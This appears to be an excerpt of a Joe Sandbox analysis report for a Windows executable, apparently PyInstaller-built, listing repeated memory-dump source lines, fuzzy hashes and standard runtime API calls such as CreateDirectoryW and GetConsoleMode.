                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                • Instruction ID: f2c38e7197dc47f755e4f4fc9c59db98361e6111eec2564fce082d899a9c6c20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4beba02b960c9f4c122fa6b087f84ea6fe2ade67e0ecd51c72e7f47762a48d3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD114230F0E642C1F954B7256651179A141BF447B0F4843B6E9BECA6E6DE2CE8536620
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                • Opcode ID: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                • Instruction ID: a7c59440312e414eb45501e4215159a45bdf2630f38a480631a7a9cb66714bfc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda0cba1a061c727c7e2df3b5d45acc099e2ee41b4dfcb91690057491b566149
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55112A30E0B607C1F968B369552117EA1427F45330F0587B6E9BECA6E2DE2CB8437621
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction ID: 029716ed5396281287a4dffc1d1ab351e8600db91d936e2610ba09f5588f5359
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A191EF32A0A646C1E761AE34D45137EF6A1BB40B94F458173DADD873E6DE3DE806A320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction ID: 9348ed71f51d04c17e839115223ea3fa1f877271958ed8dd80b1b1c630cc1a3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2818272E0AB43C5F7657F298114379A6A0BF11B44F9540B7CA89DB2A5CF2DE903E221
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction ID: c8dbcb5096e1f1895d8f0742af8fbc119d5143735d394ae0909549876aa5af07
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E517B32A09383CAEE74AF21905426877A4FB55B84F1481F7DA4D87B85CF7CE46ADB01
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF6AAE2352C,?,00000000,00007FF6AAE23F1B), ref: 00007FF6AAE27F32
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                • Instruction ID: c775eb3d622c357eaf392b62094f2fed4e9c3d2ba5d0f7fb917003ef6079aca3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D831A77171AAC6C5FE21AF21E4507AA6354FF84BE0F4402B2EE6D877C5DE2CD64A9700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction ID: d61d6d058a475f23e1ff48388eb34332a7da2ae6080f0d68f3a146158cf6c21f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21AE72B0AB4282E710AB14F8447EA73A4FB88780F404176EA8D97769DF3CD64AD740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction ID: e7f0de8043481c038adfd0f1c10daa6e5205434f7d499654e92242e6789d188c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D10372B0AA41CAE711DF75D4402AC77B1FB94798B018276DE8E97B99DE38D40BE310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE3CF4B), ref: 00007FF6AAE3D07C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE3CF4B), ref: 00007FF6AAE3D107
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction ID: dd95220f770cefda4994ded89852bbb80f4bb39a0434ba6b8038c97bee6156e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C491E632F19651CAF750AF6594802BDABA0BB40B88F1445B7DE8ED36A4DF38D447E720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction ID: 03ecd5fe1a5bdb7f3577bdb0bd702417783f77af2fdc73317324dc2a620c926c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F45135B2F06612CAEB14EF6498516BC67A5BF00358F100276DD5E9AAF4DF3CA407D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction ID: 2316d53906b9179271611a72474b0e38a4515801f1f9f6cadb1b566dfd14a9f8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E518A32E09641CAFB10EF71D4543BD67A1BF48B58F14847ADE898B7A8DF78D4429320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction ID: 0f17c19824ff5b9fa9ac18b7a6d36f7b16fecfec4dd2154750755c0d9bda41d6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6110C31F0D143C2FE54AF6AE5446BA5252FF84780F4480B2DF4947B9ADD3DD9CAA200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction ID: d28618a25a012f596ca3d2cf085b3191555745482efe7a2e7bac65cd18ea3175
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9111832B15B06CAEB00AF74E8542A933A4FB59758F440E32DA6D867A4DF78D15A9340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                • Instruction ID: a53b91ddfb85af0289ac4f83b414d455d10152489fef31206094ac7deed98899
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1841EA32A0A382C7F764A72594413796654FB80BA4F14427BEE5C87AD5DF3ED8429710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE39046
